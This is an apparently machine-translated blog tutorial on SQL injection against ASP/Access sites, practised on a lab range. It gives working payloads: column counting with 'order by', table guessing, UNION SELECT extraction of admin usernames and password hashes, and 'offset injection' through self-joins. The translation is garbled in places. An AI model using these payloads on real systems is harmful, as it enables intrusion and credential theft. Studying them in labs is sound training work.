当前位置:网站首页>SQL injection - access injection, access offset injection
SQL injection - access injection, access offset injection
2022-07-06 18:35:00 【Aspirin. two thousand and two】
Access Inject ,Access Offset Injection
Access Database composition
Table name
Name
data
some access+asp Injection range
iis+asp+access
asp General collocation access
PHP General collocation mysql
aspx General collocation msSQL
The condition of injection is that parameters can be transferred 、 Interact with the database , Data interaction
get,post,cookie Can be injected
Injection process
1.1、 Enter a page where you can transfer parameters
http://127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513
1.2、 Determine the injection point
'
perhaps and 1=1,and 1=2
1.3、 Judgment fields
127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513 order by 22
127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513 order by 23
22 Return to normal ,23 The number of error reporting description fields is 22
The table you look up here is actually product surface , find out 22 Column
1.4、 Name of judgment table
and exits (select * from admin)
, If there is a table named admin The echo is normal , If it does not exist , Echo error
1.5、 The joint query
union select
Because it is access database , Only the table name 、 Name 、 Content , You need to specify a table
?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
commonly admin It is the table for storing administrator information ,access The name of the watch depends on guessing
Try it out 3 and 15, That is to say, we can be in 3 and 15 Check the data in two places , That is, check the specified column data
http://117.24.12.33:10000/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin
This password has passed md5 encryption
Tips for guessing column names
View background ( The login page ) Source code
This range has been modified
Access Offset Injection ( Do you know the table name , I can't guess the list )
After the display bit bursts , Determine the number of fields in the table
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin error
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin error
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin error
And so on , until ...
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin correct
Illustrates the admin There are under the table 6 A field ;
use *
representative admin Number of fields in the table , Calculation *
Number of digits in place of characters .
Access Offset injection principle , The basic formula is :
order by Subtract... From the number of fields * The number of fields of the number , However, reuse order by Subtract... From the number of fields 2 Times the answer just got ;
* = 6 Characters
2 × * = 12 Characters
22 - 12 = 10 Characters
Burst name data
One level offset :union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
If you find that , The source code of the web page is checked above, and there is no data , Please use the following method :
Secondary offset statement :union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
Be careful : Here is 10 Subtract... From the table in the first field 6 A field , So the secondary offset here is select 1,2,3,4
perhaps union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)
At this point, you will be surprised to see the source code
Mozhe shooting range practice
The password goes through md5 encryption
边栏推荐
- 具体说明 Flume介绍、安装和配置
- This article discusses the memory layout of objects in the JVM, as well as the principle and application of memory alignment and compression pointer
- Docker installation redis
- 第三季百度网盘AI大赛盛夏来袭,寻找热爱AI的你!
- JDBC驱动器、C3P0、Druid和JDBCTemplate相关依赖jar包
- Echart simple component packaging
- C语言高校实验室预约登记系统
- Atcoder a mountaineer
- Markdown grammar - better blogging
- Automatic reservation of air tickets in C language
猜你喜欢
On time and parameter selection of asemi rectifier bridge db207
Self supervised heterogeneous graph neural network with CO comparative learning
Recursive way
2019阿里集群数据集使用总结
Splay
C language exchanges two numbers through pointers
使用cpolar建立一个商业网站(1)
UDP protocol: simple because of good nature, it is inevitable to encounter "city can play"
巨杉数据库首批入选金融信创解决方案!
Ms-tct: INRIA & SBU proposed a multi-scale time transformer for motion detection. The effect is SOTA! Open source! (CVPR2022)...
随机推荐
解读云原生技术
2022 Summer Project Training (II)
Excellent open source fonts for programmers
30 minutes to understand PCA principal component analysis
Interesting - questions about undefined
华为0基金会——图片整理
Why does wechat use SQLite to save chat records?
Five data structures of redis
2022/02/12
随着MapReduce job实现去加重,多种输出文件夹
SAP Fiori 应用索引大全工具和 SAP Fiori Tools 的使用介绍
[Sun Yat sen University] information sharing of postgraduate entrance examination and re examination
Grafana 9.0 is officially released! It's the strongest!
2022 Summer Project Training (III)
Recursive way
D binding function
Will openeuler last long
Stm32+esp8266+mqtt protocol connects onenet IOT platform
Recommend easy-to-use backstage management scaffolding, everyone open source
测试1234